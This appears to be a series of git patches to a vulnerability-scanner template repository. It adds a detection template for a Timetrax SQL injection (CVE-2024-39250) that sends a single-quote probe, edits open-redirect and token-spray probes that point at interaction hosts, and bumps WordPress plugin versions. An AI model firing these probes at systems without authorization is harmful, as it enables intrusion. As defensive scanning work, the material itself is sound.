    ' # digest: 4a0a0047304502207f36a4754fda5d47376179286a5929f95ecb39833d01276df125df4cbd5b3712022100e471d820cf8e65b92617364b2126738d2dcefb072e6073ae15af81d922a347f2:922c64590222798bb761d5b6d8e72950 diff --git a/http/token-spray/api-scrapestack.yaml b/http/token-spray/api-scrapestack.yaml index 0d41190b96..b1c3fe2098 100644 --- a/http/token-spray/api-scrapestack.yaml +++ b/http/token-spray/api-scrapestack.yaml @@ -17,12 +17,12 @@ self-contained: true http: - method: GET path: - - "https://api.scrapestack.com/scrape?access_key={{token}}&url=https://example.com" + - "https://api.scrapestack.com/scrape?access_key={{token}}&url=https://oast.me" matchers: - type: word part: body words: - - 'Example Domain' + - '

    Interactsh Server

    ' # digest: 4b0a00483046022100eac15c431eb927c4e320c9e035ceca60c466be6beca8cf895164f574c60216a1022100ff782e772cac1246805653374e5809e611e222b90840b47d3ff64ebd78365124:922c64590222798bb761d5b6d8e72950 diff --git a/http/token-spray/api-zenrows.yaml b/http/token-spray/api-zenrows.yaml index 5707079f74..a8e192563d 100644 --- a/http/token-spray/api-zenrows.yaml +++ b/http/token-spray/api-zenrows.yaml @@ -17,12 +17,12 @@ self-contained: true http: - method: GET path: - - "https://api.zenrows.com/v1/?apikey={{token}}&url=https://example.com" + - "https://api.zenrows.com/v1/?apikey={{token}}&url=https://oast.me/" matchers: - type: word part: body words: - - 'Example Domain' + - '

    Interactsh Server

    ' # digest: 490a00463044022053400d85ec2ff13f0c35b64bcadd50ad94e1a5dd83e8ee17fc28a0fba7da62cc022032c0210f12b83c7ebe8bd917a35c833b82ad629aa4e67377438baa7f4b673765:922c64590222798bb761d5b6d8e72950 diff --git a/http/vulnerabilities/other/bitrix-open-redirect.yaml b/http/vulnerabilities/other/bitrix-open-redirect.yaml index 31770764ae..305e6332f6 100644 --- a/http/vulnerabilities/other/bitrix-open-redirect.yaml +++ b/http/vulnerabilities/other/bitrix-open-redirect.yaml @@ -34,7 +34,7 @@ http: - '/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://interact.sh' - '/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh' - '/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh' - - '/bitrix/redirect.php?goto=https://example.com%252F:123@interactsh.com/' + - '/bitrix/redirect.php?goto=https://{{Hostname}}%252F:123@interactsh.com/' - '/bitrix/tools/track_mail_click.php?url=http://site%252F@interactsh.com/' stop-at-first-match: true From aee12296041684a8262dee441da132241427c10b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 23 Jul 2024 19:18:26 +0530 Subject: [PATCH 1572/1841] trail-space-fix --- http/exposures/backups/zip-backup-files.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposures/backups/zip-backup-files.yaml b/http/exposures/backups/zip-backup-files.yaml index 53bcdde076..fa91308566 100644 --- a/http/exposures/backups/zip-backup-files.yaml +++ b/http/exposures/backups/zip-backup-files.yaml @@ -22,7 +22,7 @@ http: payloads: FILENAME: - "{{FQDN}}" # www.example.com - - "{{RDN}}" # + - "{{RDN}}" # - "{{DN}}" # example - "{{SD}}" # www - "{{date_time('%Y')}}" # 2023 @@ -127,4 +127,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a51f2952c9c24769da7d9ad5fa3f8ad2c01a800385052b494e5cf8b8cd2b0b2002210086e92de1a4bcde1fb7758917220ed3470e42201e239106f349d60c0e28d6452b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a51f2952c9c24769da7d9ad5fa3f8ad2c01a800385052b494e5cf8b8cd2b0b2002210086e92de1a4bcde1fb7758917220ed3470e42201e239106f349d60c0e28d6452b:922c64590222798bb761d5b6d8e72950 From 419a14d454c8f059482973fe199209d3402b0264 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 23 Jul 2024 14:04:03 +0000 Subject: [PATCH 1574/1841] Auto Template Signing [Tue Jul 23 14:04:03 UTC 2024] :robot: --- dast/vulnerabilities/ssrf/response-ssrf.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/dast/vulnerabilities/ssrf/response-ssrf.yaml b/dast/vulnerabilities/ssrf/response-ssrf.yaml index c2c4fc7e4c..7c9fc93cde 100644 --- a/dast/vulnerabilities/ssrf/response-ssrf.yaml +++ b/dast/vulnerabilities/ssrf/response-ssrf.yaml @@ -132,4 +132,4 @@ http: part: body regex: - 'id[\s\S]+interfaces\/' -# digest: 4a0a00473045022100df5e466f9b2de4655561801dacd8444d412cca9556662839a5955b6c360fe47e022070272a7069a37a5df17d1177769fa87a3c21dcf8b8898e2b36652602d64adc9c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207f56832537811f8d9f528fa5af83d562549394d54ea74bfc72bf2889fec20c51022100e697d5acec83a478cb8f60b02e1c90a45ba3575c99b879749d01ed38b8ea8c48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 7cf405ef77d0feb8bf4bf9b556440aee4083e4a1 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Wed, 24 Jul 2024 02:18:42 +0300 Subject: [PATCH 1575/1841] add CVE-2024-39250 --- http/cves/2024/CVE-2024-39250.yaml | 50 ++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 http/cves/2024/CVE-2024-39250.yaml diff --git a/http/cves/2024/CVE-2024-39250.yaml b/http/cves/2024/CVE-2024-39250.yaml new file mode 100644 index 0000000000..beb9189b88 --- /dev/null +++ b/http/cves/2024/CVE-2024-39250.yaml @@ -0,0 +1,50 @@ +id: CVE-2024-39250 + +info: + name: EfroTech Timetrax v8.3 - Sql Injection + author: securityforeveryone,efran + severity: high + description: | + EfroTech Timetrax v8.3 was discovered to contain an unauthenticated SQL injection vulnerability via the q parameter in the search web interface. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-39250 + - https://www.tenable.com/cve/CVE-2024-39250 + - https://github.com/efrann/CVE-2024-39250 + - https://vuldb.com/?id.272268 + classification: + epss-score: 0.00043 + epss-percentile: 0.09359 + metadata: + vendor: EfroTech + product: Timetrax + fofa-query: icon_hash="-661694518" + tags: cve,cve2024,sqli,timetrax +flow: http(1) && http(2) + +http: + - raw: + - | + GET /Login.aspx HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body,"TimeTrax - Cloud HR Software")' + - 'contains(content_type, "text/html")' + - 'status_code == 200' + condition: and + internal: true + + - raw: + - | + GET /search.aspx?q=' HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains_all(body,"Incorrect syntax near","Unclosed quotation mark after the character string")' + - 'contains(content_type, "text/html")' + - 'status_code == 500' + condition: and From b18289f7bf93dd25a9ee86c2d385fb3ceb84a848 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 24 Jul 2024 00:20:45 +0000 Subject: [PATCH 1576/1841] Auto WordPress Plugins Update [Wed Jul 24 00:20:45 UTC 2024] :robot: --- helpers/wordpress/plugins/backwpup.txt | 2 +- helpers/wordpress/plugins/easy-wp-smtp.txt | 2 +- helpers/wordpress/plugins/elementor.txt | 2 +- helpers/wordpress/plugins/facebook-for-woocommerce.txt | 2 +- helpers/wordpress/plugins/fluent-smtp.txt | 2 +- helpers/wordpress/plugins/leadin.txt | 2 +- helpers/wordpress/plugins/mailpoet.txt | 2 +- helpers/wordpress/plugins/pinterest-for-woocommerce.txt | 2 +- helpers/wordpress/plugins/premium-addons-for-elementor.txt | 2 +- helpers/wordpress/plugins/pretty-link.txt | 2 +- helpers/wordpress/plugins/so-widgets-bundle.txt | 2 +- helpers/wordpress/plugins/the-events-calendar.txt | 2 +- helpers/wordpress/plugins/wordpress-seo.txt | 2 +- helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt | 2 +- helpers/wordpress/plugins/wp-seopress.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - .../technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - http/technologies/wordpress/plugins/chaty.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - .../technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluent-smtp.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - .../technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - .../technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 3 +-- http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - .../technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - .../technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - .../technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 215 files changed, 16 insertions(+), 216 deletions(-) diff --git a/helpers/wordpress/plugins/backwpup.txt b/helpers/wordpress/plugins/backwpup.txt index 8c7fafd365..9d086c6dff 100644 --- a/helpers/wordpress/plugins/backwpup.txt +++ b/helpers/wordpress/plugins/backwpup.txt @@ -1 +1 @@ -4.1.3 \ No newline at end of file +4.1.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/easy-wp-smtp.txt b/helpers/wordpress/plugins/easy-wp-smtp.txt index a6254504e4..e7034819f6 100644 --- a/helpers/wordpress/plugins/easy-wp-smtp.txt +++ b/helpers/wordpress/plugins/easy-wp-smtp.txt @@ -1 +1 @@ -2.3.1 \ No newline at end of file +2.3.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/elementor.txt b/helpers/wordpress/plugins/elementor.txt index 86ad5938a3..11e61feaba 100644 --- a/helpers/wordpress/plugins/elementor.txt +++ b/helpers/wordpress/plugins/elementor.txt @@ -1 +1 @@ -3.23.1 \ No newline at end of file +3.23.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/facebook-for-woocommerce.txt b/helpers/wordpress/plugins/facebook-for-woocommerce.txt index 448ada3bda..c4a602db6e 100644 --- a/helpers/wordpress/plugins/facebook-for-woocommerce.txt +++ b/helpers/wordpress/plugins/facebook-for-woocommerce.txt @@ -1 +1 @@ -3.2.5 \ No newline at end of file +3.2.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/fluent-smtp.txt b/helpers/wordpress/plugins/fluent-smtp.txt index ceadef46d3..3ae3885dd4 100644 --- a/helpers/wordpress/plugins/fluent-smtp.txt +++ b/helpers/wordpress/plugins/fluent-smtp.txt @@ -1 +1 @@ -2.2.80 +2.2.80 \ No newline at end of file diff --git a/helpers/wordpress/plugins/leadin.txt b/helpers/wordpress/plugins/leadin.txt index d6b8ad7bea..00afc4aa6b 100644 --- a/helpers/wordpress/plugins/leadin.txt +++ b/helpers/wordpress/plugins/leadin.txt @@ -1 +1 @@ -11.1.22 \ No newline at end of file +11.1.34 \ No newline at end of file diff --git a/helpers/wordpress/plugins/mailpoet.txt b/helpers/wordpress/plugins/mailpoet.txt index cc90415fe2..39364c98a4 100644 --- a/helpers/wordpress/plugins/mailpoet.txt +++ b/helpers/wordpress/plugins/mailpoet.txt @@ -1 +1 @@ -4.56.0 \ No newline at end of file +4.57.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/pinterest-for-woocommerce.txt b/helpers/wordpress/plugins/pinterest-for-woocommerce.txt index b4f409c95b..a4d4b86a2e 100644 --- a/helpers/wordpress/plugins/pinterest-for-woocommerce.txt +++ b/helpers/wordpress/plugins/pinterest-for-woocommerce.txt @@ -1 +1 @@ -1.3.24 \ No newline at end of file +1.3.25 \ No newline at end of file diff --git a/helpers/wordpress/plugins/premium-addons-for-elementor.txt b/helpers/wordpress/plugins/premium-addons-for-elementor.txt index 7f5db23d1c..b4d362caa1 100644 --- a/helpers/wordpress/plugins/premium-addons-for-elementor.txt +++ b/helpers/wordpress/plugins/premium-addons-for-elementor.txt @@ -1 +1 @@ -4.10.37 \ No newline at end of file +4.10.38 \ No newline at end of file diff --git a/helpers/wordpress/plugins/pretty-link.txt b/helpers/wordpress/plugins/pretty-link.txt index 2d0b31e4f7..0da667e1e5 100644 --- a/helpers/wordpress/plugins/pretty-link.txt +++ b/helpers/wordpress/plugins/pretty-link.txt @@ -1 +1 @@ -3.6.7 \ No newline at end of file +3.6.8 \ No newline at end of file diff --git a/helpers/wordpress/plugins/so-widgets-bundle.txt b/helpers/wordpress/plugins/so-widgets-bundle.txt index 244eebc121..122127e2d6 100644 --- a/helpers/wordpress/plugins/so-widgets-bundle.txt +++ b/helpers/wordpress/plugins/so-widgets-bundle.txt @@ -1 +1 @@ -1.62.2 \ No newline at end of file +1.62.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/the-events-calendar.txt b/helpers/wordpress/plugins/the-events-calendar.txt index cd802a1ec4..94c669e9ea 100644 --- a/helpers/wordpress/plugins/the-events-calendar.txt +++ b/helpers/wordpress/plugins/the-events-calendar.txt @@ -1 +1 @@ -6.6.0 \ No newline at end of file +6.6.0.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wordpress-seo.txt b/helpers/wordpress/plugins/wordpress-seo.txt index 4266d86348..eaccea244b 100644 --- a/helpers/wordpress/plugins/wordpress-seo.txt +++ b/helpers/wordpress/plugins/wordpress-seo.txt @@ -1 +1 @@ -23.0 \ No newline at end of file +23.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt b/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt index 4a01f41a89..8bafbd7759 100644 --- a/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt +++ b/helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt @@ -1 +1 @@ -11.9 \ No newline at end of file +12.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-seopress.txt b/helpers/wordpress/plugins/wp-seopress.txt index e048e60ec1..b293f64d6c 100644 --- a/helpers/wordpress/plugins/wp-seopress.txt +++ b/helpers/wordpress/plugins/wp-seopress.txt @@ -1 +1 @@ -7.9.2 \ No newline at end of file +8.0 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 25d977e705..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b997c48a6cd74aaff470e7d2220282141de65b8dc50ab66e618608912395677b02210094403f0748750eefd139874551fa3589c062f791d97c8acf1c93f7e3d48f75aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 7b5c7ff814..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220689e9d865acb88bed9cdc43eefd621a1f58ade7c1776762568c68be5fecb0af2022100e040e4f75646e3ff2ba41659a09b755cca2bf7b35ae376ddd58cec53fbc0d158:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 59dc2b9c63..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022063c8384154319fcd6d4d595cb90bec189e1193e06e805fdec2b5d98aa37b9274022100e93b20b1a583929eb22d11a678116cf25feedf7258b4b43ecf360ed03fbfc3ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 68e4b2497e..cddbb4bb2e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009bb435ef37de924bac4076316a10166dacf72edd3f46e17c0122cdb4ec5ecac902201ca7d821fa1753d3e0f6ef772f254ce3c06ae45d2e8ce3b21d5415b4b188b444:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 7e4da9eae1..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f5118d2e4dcb34e6dbe43781da9da7115654725300df9ad78dff6e10ec050b410220372e010f69ebef56e12b7ed8d17a0441c961548dbd338a30b2d8fecd1783cfec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index ea6a98de11..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a70f4ddb326e0cf5d04f645315c8b3d957d674848ed19c56c8cee3159f71979d022044e756f79911dc55daa7dfb6ffa0437bc7c4621c788814ed95dc348fd2e97ecb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 